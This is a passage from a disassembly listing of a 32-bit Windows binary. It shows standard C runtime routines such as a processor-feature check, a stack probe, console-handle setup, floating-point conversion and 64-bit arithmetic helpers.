		jp	short loc_41198C
		xor	eax, eax
		inc	eax
		leave
		retn
; ---------------------------------------------------------------------------

loc_41198C:				; CODE XREF: sub_411954+31j
		xor	eax, eax
		leave
		retn
sub_411954	endp


; =============== S U B	R O U T	I N E =======================================



sub_411990	proc near		; CODE XREF: sub_40FD2B+5p
		push	offset aKernel32 ; "KERNEL32"
		call	ds:dword_41E0E0	; GetModuleHandleA
		test	eax, eax
		jz	short loc_4119B4
		push	offset aIsprocessorfea ; "IsProcessorFeaturePresent"
		push	eax
		call	ds:off_41E0E8
		test	eax, eax
		jz	short loc_4119B4
		push	0
		call	eax
		retn
; ---------------------------------------------------------------------------

loc_4119B4:				; CODE XREF: sub_411990+Dj
					; sub_411990+1Dj
		jmp	sub_411954
sub_411990	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_4119C0	proc near		; CODE XREF: sub_410A70+11j
					; .text:00410A97j ...
		push	ecx
		lea	ecx, [esp+4]
		sub	ecx, eax
		sbb	eax, eax
		not	eax
		and	ecx, eax
		mov	eax, esp
		and	eax, 0FFFFF000h

loc_4119D4:				; CODE XREF: sub_4119C0+29j
		cmp	ecx, eax
		jb	short loc_4119E2
		mov	eax, ecx
		pop	ecx
		xchg	eax, esp
		mov	eax, [eax]
		mov	[esp+0], eax
		retn
; ---------------------------------------------------------------------------

loc_4119E2:				; CODE XREF: sub_4119C0+16j
		sub	eax, 1000h
		test	[eax], eax
		jmp	short loc_4119D4
sub_4119C0	endp


; =============== S U B	R O U T	I N E =======================================



sub_4119EB	proc near		; CODE XREF: sub_410A9C+24p
		xor	eax, eax
		push	eax
		push	eax
		push	3
		push	eax
		push	3
		push	40000000h
		push	offset aConout	; "CONOUT$"
		call	ds:off_41E06C
		mov	dword_425224, eax
		retn
sub_4119EB	endp


; =============== S U B	R O U T	I N E =======================================



sub_411A0A	proc near		; DATA XREF: zcrshv4o:0041E300o
		mov	eax, dword_425224
		cmp	eax, 0FFFFFFFFh
		push	esi
		mov	esi, ds:off_41E0D8
		jz	short loc_411A23
		cmp	eax, 0FFFFFFFEh
		jz	short loc_411A23
		push	eax
		call	esi ; sub_443E8D

loc_411A23:				; CODE XREF: sub_411A0A+Fj
					; sub_411A0A+14j
		mov	eax, dword_425220
		cmp	eax, 0FFFFFFFFh
		jz	short loc_411A35
		cmp	eax, 0FFFFFFFEh
		jz	short loc_411A35
		push	eax
		call	esi ; sub_443E8D

loc_411A35:				; CODE XREF: sub_411A0A+21j
					; sub_411A0A+26j
		pop	esi
		retn
sub_411A0A	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411A40	proc near		; CODE XREF: sub_41126D+102p

arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	edi
		mov	edi, [ebp+arg_0]
		xor	eax, eax
		or	ecx, 0FFFFFFFFh
		repne scasb
		add	ecx, 1
		neg	ecx
		sub	edi, 1
		mov	al, [ebp+arg_4]
		std
		repne scasb
		add	edi, 1
		cmp	[edi], al
		jz	short loc_411A67
		xor	eax, eax
		jmp	short loc_411A69
; ---------------------------------------------------------------------------

loc_411A67:				; CODE XREF: sub_411A40+21j
		mov	eax, edi

loc_411A69:				; CODE XREF: sub_411A40+25j
		cld
		pop	edi
		leave
		retn
sub_411A40	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411A6D	proc near		; CODE XREF: sub_410F84+15p

var_28		= byte ptr -28h
var_24		= byte ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	[ebp+arg_8]
		mov	edi, [ebp+arg_4]
		lea	ecx, [ebp+var_24]
		call	sub_402CAD
		lea	eax, [ebp+var_24]
		push	eax
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	edi
		lea	eax, [ebp+var_28]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_4129AD
		mov	[ebp+var_14], eax
		lea	eax, [ebp+var_10]
		push	esi
		push	eax
		call	sub_411F29
		add	esp, 28h
		test	byte ptr [ebp+var_14], 3
		jnz	short loc_411AEA
		cmp	eax, 1
		jnz	short loc_411AD5

loc_411AC4:				; CODE XREF: sub_411A6D+87j
		cmp	[ebp+var_18], bl
		jz	short loc_411AD0
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411AD0:				; CODE XREF: sub_411A6D+5Aj
		push	3

loc_411AD2:				; CODE XREF: sub_411A6D+7Bj
		pop	eax
		jmp	short loc_411B04
; ---------------------------------------------------------------------------

loc_411AD5:				; CODE XREF: sub_411A6D+55j
		cmp	eax, 2
		jnz	short loc_411AF6

loc_411ADA:				; CODE XREF: sub_411A6D+81j
		cmp	[ebp+var_18], bl
		jz	short loc_411AE6
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411AE6:				; CODE XREF: sub_411A6D+70j
		push	4
		jmp	short loc_411AD2
; ---------------------------------------------------------------------------

loc_411AEA:				; CODE XREF: sub_411A6D+50j
		test	byte ptr [ebp+var_14], 1
		jnz	short loc_411ADA
		test	byte ptr [ebp+var_14], 2
		jnz	short loc_411AC4

loc_411AF6:				; CODE XREF: sub_411A6D+6Bj
		cmp	[ebp+var_18], bl
		jz	short loc_411B02
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411B02:				; CODE XREF: sub_411A6D+8Cj
		xor	eax, eax

loc_411B04:				; CODE XREF: sub_411A6D+66j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411A6D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411B13	proc near		; CODE XREF: sub_410F84+2Ep

var_28		= byte ptr -28h
var_24		= byte ptr -24h
var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= dword	ptr -14h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 28h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		push	edi
		push	[ebp+arg_8]
		mov	edi, [ebp+arg_4]
		lea	ecx, [ebp+var_24]
		call	sub_402CAD
		lea	eax, [ebp+var_24]
		push	eax
		xor	ebx, ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	edi
		lea	eax, [ebp+var_28]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_4129AD
		mov	[ebp+var_14], eax
		lea	eax, [ebp+var_10]
		push	esi
		push	eax
		call	sub_41246B
		add	esp, 28h
		test	byte ptr [ebp+var_14], 3
		jnz	short loc_411B90
		cmp	eax, 1
		jnz	short loc_411B7B

loc_411B6A:				; CODE XREF: sub_411B13+87j
		cmp	[ebp+var_18], bl
		jz	short loc_411B76
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411B76:				; CODE XREF: sub_411B13+5Aj
		push	3

loc_411B78:				; CODE XREF: sub_411B13+7Bj
		pop	eax
		jmp	short loc_411BAA
; ---------------------------------------------------------------------------

loc_411B7B:				; CODE XREF: sub_411B13+55j
		cmp	eax, 2
		jnz	short loc_411B9C

loc_411B80:				; CODE XREF: sub_411B13+81j
		cmp	[ebp+var_18], bl
		jz	short loc_411B8C
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411B8C:				; CODE XREF: sub_411B13+70j
		push	4
		jmp	short loc_411B78
; ---------------------------------------------------------------------------

loc_411B90:				; CODE XREF: sub_411B13+50j
		test	byte ptr [ebp+var_14], 1
		jnz	short loc_411B80
		test	byte ptr [ebp+var_14], 2
		jnz	short loc_411B6A

loc_411B9C:				; CODE XREF: sub_411B13+6Bj
		cmp	[ebp+var_18], bl
		jz	short loc_411BA8
		mov	eax, [ebp+var_1C]
		and	dword ptr [eax+70h], 0FFFFFFFDh

loc_411BA8:				; CODE XREF: sub_411B13+8Cj
		xor	eax, eax

loc_411BAA:				; CODE XREF: sub_411B13+66j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411B13	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411BB9	proc near		; CODE XREF: sub_411181+96p
					; sub_4116D3+85p ...

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		mov	ecx, [ebp+arg_C]
		push	ebx
		push	esi
		mov	esi, [ebp+arg_0]
		xor	ebx, ebx
		cmp	esi, ebx
		push	edi
		mov	edi, [ecx+0Ch]
		jnz	short loc_411BEC

loc_411BCE:				; CODE XREF: sub_411BB9+36j
		call	sub_405D93
		push	16h
		pop	esi
		mov	[eax], esi

loc_411BD8:				; CODE XREF: sub_411BB9+59j
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		call	sub_4034C7
		add	esp, 14h
		mov	eax, esi
		jmp	loc_411C71
; ---------------------------------------------------------------------------

loc_411BEC:				; CODE XREF: sub_411BB9+13j
		cmp	[ebp+arg_4], ebx
		jbe	short loc_411BCE
		mov	edx, [ebp+arg_8]
		cmp	edx, ebx
		mov	[esi], bl
		jle	short loc_411BFE
		mov	eax, edx
		jmp	short loc_411C00
; ---------------------------------------------------------------------------

loc_411BFE:				; CODE XREF: sub_411BB9+3Fj
		xor	eax, eax

loc_411C00:				; CODE XREF: sub_411BB9+43j
		inc	eax
		cmp	[ebp+arg_4], eax
		ja	short loc_411C14
		call	sub_405D93
		push	22h
		pop	ecx
		mov	[eax], ecx
		mov	esi, ecx
		jmp	short loc_411BD8
; ---------------------------------------------------------------------------

loc_411C14:				; CODE XREF: sub_411BB9+4Bj
		cmp	edx, ebx
		mov	byte ptr [esi],	30h
		lea	eax, [esi+1]
		jle	short loc_411C38

loc_411C1E:				; CODE XREF: sub_411BB9+7Aj
		mov	cl, [edi]
		cmp	cl, bl
		jz	short loc_411C2A
		movsx	ecx, cl
		inc	edi
		jmp	short loc_411C2D
; ---------------------------------------------------------------------------

loc_411C2A:				; CODE XREF: sub_411BB9+69j
		push	30h
		pop	ecx

loc_411C2D:				; CODE XREF: sub_411BB9+6Fj
		mov	[eax], cl
		inc	eax
		dec	edx
		cmp	edx, ebx
		jg	short loc_411C1E
		mov	ecx, [ebp+arg_C]

loc_411C38:				; CODE XREF: sub_411BB9+63j
		cmp	edx, ebx
		mov	[eax], bl
		jl	short loc_411C50
		cmp	byte ptr [edi],	35h
		jl	short loc_411C50
		jmp	short loc_411C48
; ---------------------------------------------------------------------------

loc_411C45:				; CODE XREF: sub_411BB9+93j
		mov	byte ptr [eax],	30h

loc_411C48:				; CODE XREF: sub_411BB9+8Aj
		dec	eax
		cmp	byte ptr [eax],	39h
		jz	short loc_411C45
		inc	byte ptr [eax]

loc_411C50:				; CODE XREF: sub_411BB9+83j
					; sub_411BB9+88j
		cmp	byte ptr [esi],	31h
		jnz	short loc_411C5A
		inc	dword ptr [ecx+4]
		jmp	short loc_411C6F
; ---------------------------------------------------------------------------

loc_411C5A:				; CODE XREF: sub_411BB9+9Aj
		lea	edi, [esi+1]
		push	edi
		call	sub_4046F0
		inc	eax
		push	eax
		push	edi
		push	esi
		call	sub_407930
		add	esp, 10h

loc_411C6F:				; CODE XREF: sub_411BB9+9Fj
		xor	eax, eax

loc_411C71:				; CODE XREF: sub_411BB9+2Ej
		pop	edi
		pop	esi
		pop	ebx
		pop	ebp
		retn
sub_411BB9	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411C76	proc near		; CODE XREF: sub_411D31+24p

var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		push	ecx
		mov	edx, [ebp+arg_4]
		movzx	eax, word ptr [edx+6]
		push	ebx
		mov	ecx, eax
		push	esi
		push	edi
		shr	ecx, 4
		and	eax, 8000h
		mov	edi, 7FFh
		and	ecx, edi
		mov	[ebp+arg_4], eax
		mov	eax, [edx+4]
		mov	edx, [edx]
		movzx	ebx, cx
		mov	esi, 80000000h
		and	eax, 0FFFFFh
		test	ebx, ebx
		mov	[ebp+var_4], esi
		jz	short loc_411CC4
		cmp	ebx, edi
		jz	short loc_411CBD
		add	ecx, 3C00h
		jmp	short loc_411CE5
; ---------------------------------------------------------------------------

loc_411CBD:				; CODE XREF: sub_411C76+3Dj
		mov	edi, 7FFFh
		jmp	short loc_411CE8
; ---------------------------------------------------------------------------

loc_411CC4:				; CODE XREF: sub_411C76+39j
		xor	ebx, ebx
		cmp	eax, ebx
		jnz	short loc_411CDC
		cmp	edx, ebx
		jnz	short loc_411CDC
		mov	eax, [ebp+arg_0]
		mov	cx, word ptr [ebp+arg_4]
		mov	[eax+4], ebx
		mov	[eax], ebx
		jmp	short loc_411D28
; ---------------------------------------------------------------------------

loc_411CDC:				; CODE XREF: sub_411C76+52j
					; sub_411C76+56j
		add	ecx, 3C01h
		mov	[ebp+var_4], ebx

loc_411CE5:				; CODE XREF: sub_411C76+45j
		movzx	edi, cx

loc_411CE8:				; CODE XREF: sub_411C76+4Cj
		mov	ecx, edx
		shr	ecx, 15h
		shl	eax, 0Bh
		or	ecx, eax
		or	ecx, [ebp+var_4]
		mov	eax, [ebp+arg_0]
		shl	edx, 0Bh
		test	ecx, esi
		mov	[eax+4], ecx
		mov	[eax], edx
		jnz	short loc_411D23

loc_411D04:				; CODE XREF: sub_411C76+ABj
		mov	ecx, [eax]
		mov	edx, [eax+4]
		mov	ebx, ecx
		add	edx, edx
		shr	ebx, 1Fh
		or	edx, ebx
		add	ecx, ecx
		add	edi, 0FFFFh
		test	edx, esi
		mov	[eax+4], edx
		mov	[eax], ecx
		jz	short loc_411D04

loc_411D23:				; CODE XREF: sub_411C76+8Cj
		mov	ecx, [ebp+arg_4]
		or	ecx, edi

loc_411D28:				; CODE XREF: sub_411C76+64j
		pop	edi
		pop	esi
		mov	[eax+8], cx
		pop	ebx
		leave
		retn
sub_411C76	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411D31	proc near		; CODE XREF: sub_411181+2Ap
					; sub_4116D3+2Ap ...

var_30		= dword	ptr -30h
var_2C		= word ptr -2Ch
var_2A		= byte ptr -2Ah
var_28		= byte ptr -28h
var_10		= byte ptr -10h
var_4		= dword	ptr -4
arg_0		= byte ptr  8
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_C]
		push	ebx
		mov	ebx, [ebp+arg_8]
		push	esi
		mov	[ebp+var_30], eax
		push	edi
		lea	eax, [ebp+arg_0]
		push	eax
		lea	eax, [ebp+var_10]
		push	eax
		call	sub_411C76
		pop	ecx
		pop	ecx
		lea	eax, [ebp+var_2C]
		push	eax
		push	0
		push	11h
		sub	esp, 0Ch
		lea	esi, [ebp+var_10]
		mov	edi, esp
		movsd
		movsd
		movsw
		call	sub_413071
		mov	esi, [ebp+var_30]
		mov	[ebx+8], eax
		movsx	eax, [ebp+var_2A]
		mov	[ebx], eax
		movsx	eax, [ebp+var_2C]
		mov	[ebx+4], eax
		lea	eax, [ebp+var_28]
		push	eax
		push	[ebp+arg_10]
		push	esi
		call	sub_407C95
		add	esp, 24h
		test	eax, eax
		jz	short loc_411DAB
		xor	eax, eax
		push	eax
		push	eax
		push	eax
		push	eax
		push	eax
		call	sub_4033CB
		add	esp, 14h

loc_411DAB:				; CODE XREF: sub_411D31+69j
		mov	ecx, [ebp+var_4]
		pop	edi
		mov	[ebx+0Ch], esi
		pop	esi
		mov	eax, ebx
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_411D31	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_411DC0	proc near		; CODE XREF: sub_41126D+2F7p
					; sub_41126D+31Dp ...

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8
arg_8		= dword	ptr  0Ch
arg_C		= dword	ptr  10h

		push	edi
		push	esi
		push	ebp
		xor	edi, edi
		xor	ebp, ebp
		mov	eax, [esp+0Ch+arg_4]
		or	eax, eax
		jge	short loc_411DE4
		inc	edi
		inc	ebp
		mov	edx, [esp+0Ch+arg_0]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_4], eax
		mov	[esp+0Ch+arg_0], edx

loc_411DE4:				; CODE XREF: sub_411DC0+Dj
		mov	eax, [esp+0Ch+arg_C]
		or	eax, eax
		jge	short loc_411E00
		inc	edi
		mov	edx, [esp+0Ch+arg_8]
		neg	eax
		neg	edx
		sbb	eax, 0
		mov	[esp+0Ch+arg_C], eax
		mov	[esp+0Ch+arg_8], edx

loc_411E00:				; CODE XREF: sub_411DC0+2Aj
		or	eax, eax
		jnz	short loc_411E2C
		mov	ecx, [esp+0Ch+arg_8]
		mov	eax, [esp+0Ch+arg_4]
		xor	edx, edx
		div	ecx
		mov	ebx, eax
		mov	eax, [esp+0Ch+arg_0]
		div	ecx
		mov	esi, eax
		mov	eax, ebx
		mul	[esp+0Ch+arg_8]
		mov	ecx, eax
		mov	eax, esi
		mul	[esp+0Ch+arg_8]
		add	edx, ecx
		jmp	short loc_411E73
; ---------------------------------------------------------------------------

loc_411E2C:				; CODE XREF: sub_411DC0+42j
		mov	ebx, eax
		mov	ecx, [esp+0Ch+arg_8]
		mov	edx, [esp+0Ch+arg_4]
		mov	eax, [esp+0Ch+arg_0]

loc_411E3A:				; CODE XREF: sub_411DC0+84j
		shr	ebx, 1
		rcr	ecx, 1
		shr	edx, 1
		rcr	eax, 1
		or	ebx, ebx
		jnz	short loc_411E3A
		div	ecx
		mov	esi, eax
		mul	[esp+0Ch+arg_C]
		mov	ecx, eax
		mov	eax, [esp+0Ch+arg_8]
		mul	esi
		add	edx, ecx
		jb	short loc_411E68
		cmp	edx, [esp+0Ch+arg_4]
		ja	short loc_411E68
		jb	short loc_411E71
		cmp	eax, [esp+0Ch+arg_0]
		jbe	short loc_411E71

loc_411E68:				; CODE XREF: sub_411DC0+98j
					; sub_411DC0+9Ej
		dec	esi
		sub	eax, [esp+0Ch+arg_8]
		sbb	edx, [esp+0Ch+arg_C]

loc_411E71:				; CODE XREF: sub_411DC0+A0j
					; sub_411DC0+A6j
		xor	ebx, ebx

loc_411E73:				; CODE XREF: sub_411DC0+6Aj
		sub	eax, [esp+0Ch+arg_0]
		sbb	edx, [esp+0Ch+arg_4]
		dec	ebp
		jns	short loc_411E85
		neg	edx
		neg	eax
		sbb	edx, 0

loc_411E85:				; CODE XREF: sub_411DC0+BCj
		mov	ecx, edx
		mov	edx, ebx
		mov	ebx, ecx
		mov	ecx, eax
		mov	eax, esi
		dec	edi
		jnz	short loc_411E99
		neg	edx
		neg	eax
		sbb	edx, 0

loc_411E99:				; CODE XREF: sub_411DC0+D0j
		pop	ebp
		pop	esi
		pop	edi
		retn	10h
sub_411DC0	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_411EA0	proc near		; CODE XREF: sub_41126D+1EAp
					; sub_41126D+23Ep ...
		cmp	cl, 40h
		jnb	short loc_411EBA
		cmp	cl, 20h
		jnb	short loc_411EB0
		shrd	eax, edx, cl
		shr	edx, cl
		retn
; ---------------------------------------------------------------------------

loc_411EB0:				; CODE XREF: sub_411EA0+8j
		mov	eax, edx
		xor	edx, edx
		and	cl, 1Fh
		shr	eax, cl
		retn
; ---------------------------------------------------------------------------

loc_411EBA:				; CODE XREF: sub_411EA0+3j
		xor	eax, eax
		xor	edx, edx
		retn
sub_411EA0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411EBF	proc near		; CODE XREF: sub_41192B+Ep

arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		mov	eax, [ebp+arg_8]
		mov	ecx, [ebp+arg_4]
		and	eax, 0FFF7FFFFh
		and	ecx, eax
		test	ecx, 0FCF0FCE0h
		push	esi
		jz	short loc_411F09
		push	edi
		mov	edi, [ebp+arg_0]
		xor	esi, esi
		cmp	edi, esi
		jz	short loc_411EED
		push	esi
		push	esi
		call	sub_413A67
		pop	ecx
		pop	ecx
		mov	[edi], eax

loc_411EED:				; CODE XREF: sub_411EBF+21j
		call	sub_405D93
		push	16h
		pop	edi
		push	esi
		push	esi
		push	esi
		push	esi
		push	esi
		mov	[eax], edi
		call	sub_4034C7
		add	esp, 14h
		mov	eax, edi
		pop	edi
		jmp	short loc_411F26
; ---------------------------------------------------------------------------

loc_411F09:				; CODE XREF: sub_411EBF+17j
		mov	esi, [ebp+arg_0]
		test	esi, esi
		push	eax
		push	[ebp+arg_4]
		jz	short loc_411F1D
		call	sub_413A67
		mov	[esi], eax
		jmp	short loc_411F22
; ---------------------------------------------------------------------------

loc_411F1D:				; CODE XREF: sub_411EBF+53j
		call	sub_413A67

loc_411F22:				; CODE XREF: sub_411EBF+5Cj
		pop	ecx
		pop	ecx
		xor	eax, eax

loc_411F26:				; CODE XREF: sub_411EBF+48j
		pop	esi
		pop	ebp
		retn
sub_411EBF	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_411F29	proc near		; CODE XREF: sub_411A6D+44p

var_2C		= byte ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, [ebp+arg_0]
		movzx	ecx, word ptr [eax+0Ah]
		push	ebx
		mov	ebx, ecx
		and	ecx, 8000h
		mov	[ebp+var_14], ecx
		mov	ecx, [eax+6]
		mov	[ebp+var_20], ecx
		mov	ecx, [eax+2]
		movzx	eax, word ptr [eax]
		and	ebx, 7FFFh
		sub	ebx, 3FFFh
		shl	eax, 10h
		cmp	ebx, 0FFFFC001h
		push	edi
		mov	[ebp+var_1C], ecx
		mov	[ebp+var_18], eax
		jnz	short loc_411F93
		xor	ebx, ebx
		xor	eax, eax

loc_411F70:				; CODE XREF: sub_411F29+51j
		cmp	[ebp+eax*4+var_20], ebx
		jnz	short loc_411F83
		inc	eax
		cmp	eax, 3
		jl	short loc_411F70
		xor	eax, eax
		jmp	loc_412428
; ---------------------------------------------------------------------------

loc_411F83:				; CODE XREF: sub_411F29+4Bj
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		push	2
		stosd
		pop	eax
		jmp	loc_412428
; ---------------------------------------------------------------------------

loc_411F93:				; CODE XREF: sub_411F29+41j
		and	[ebp+arg_0], 0
		push	esi
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_2C]
		movsd
		movsd
		movsd
		mov	esi, dword_425238
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], eax
		jns	short loc_411FCB
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_411FCB:				; CODE XREF: sub_411F29+9Bj
		lea	edi, [ebp+eax*4+var_20]
		push	1Fh
		xor	eax, eax
		pop	ecx
		sub	ecx, edx
		inc	eax
		shl	eax, cl
		mov	[ebp+var_8], ecx
		test	[edi], eax
		jz	loc_412071
		mov	eax, [ebp+var_C]
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_411FF9
; ---------------------------------------------------------------------------

loc_411FF4:				; CODE XREF: sub_411F29+D6j
		cmp	[ebp+eax*4+var_20], 0

loc_411FF9:				; CODE XREF: sub_411F29+C9j
		jnz	short loc_412003
		inc	eax
		cmp	eax, 3
		jl	short loc_411FF4
		jmp	short loc_412071
; ---------------------------------------------------------------------------

loc_412003:				; CODE XREF: sub_411F29:loc_411FF9j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_41201D
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_41201D:				; CODE XREF: sub_411F29+EDj
		and	[ebp+var_4], 0
		sub	ecx, esi
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		add	esi, edx
		mov	[ebp+arg_0], esi
		mov	esi, [ecx]
		cmp	[ebp+arg_0], esi
		jb	short loc_41205C
		cmp	[ebp+arg_0], edx
		jmp	short loc_41205A
; ---------------------------------------------------------------------------

loc_41203F:				; CODE XREF: sub_411F29+143j
		test	ecx, ecx
		jz	short loc_41206E
		and	[ebp+var_4], 0
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		cmp	esi, edx
		mov	[ebp+arg_0], esi
		jb	short loc_41205C
		cmp	esi, 1

loc_41205A:				; CODE XREF: sub_411F29+114j
		jnb	short loc_412063

loc_41205C:				; CODE XREF: sub_411F29+10Fj
					; sub_411F29+12Cj
		mov	[ebp+var_4], 1

loc_412063:				; CODE XREF: sub_411F29:loc_41205Aj
		dec	eax
		mov	edx, [ebp+arg_0]
		mov	[ecx], edx
		mov	ecx, [ebp+var_4]
		jns	short loc_41203F

loc_41206E:				; CODE XREF: sub_411F29+118j
		mov	[ebp+arg_0], ecx

loc_412071:				; CODE XREF: sub_411F29+B5j
					; sub_411F29+D8j
		mov	ecx, [ebp+var_8]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[edi], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412091
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412091:				; CODE XREF: sub_411F29+159j
		cmp	[ebp+arg_0], 0
		jz	short loc_412098
		inc	ebx

loc_412098:				; CODE XREF: sub_411F29+16Cj
		mov	eax, dword_425234
		mov	ecx, eax
		sub	ecx, dword_425238
		cmp	ebx, ecx
		jge	short loc_4120B6
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		jmp	loc_4122C3
; ---------------------------------------------------------------------------

loc_4120B6:				; CODE XREF: sub_411F29+17Ej
		cmp	ebx, eax
		jg	loc_4122CD
		sub	eax, [ebp+var_10]
		lea	esi, [ebp+var_2C]
		mov	ecx, eax
		lea	edi, [ebp+var_20]
		movsd
		cdq
		and	edx, 1Fh
		add	eax, edx
		movsd
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		movsd
		jns	short loc_4120E4
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4120E4:				; CODE XREF: sub_411F29+1B4j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_4120FF:				; CODE XREF: sub_411F29+201j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_4120FF
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_412139:				; CODE XREF: sub_411F29+227j
		cmp	edx, eax
		jl	short loc_412145
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41214A
; ---------------------------------------------------------------------------

loc_412145:				; CODE XREF: sub_411F29+212j
		and	[ebp+edx*4+var_20], 0

loc_41214A:				; CODE XREF: sub_411F29+21Aj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_412139
		mov	esi, dword_425238
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_C], eax
		jns	short loc_412179
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412179:				; CODE XREF: sub_411F29+249j
		push	1Fh
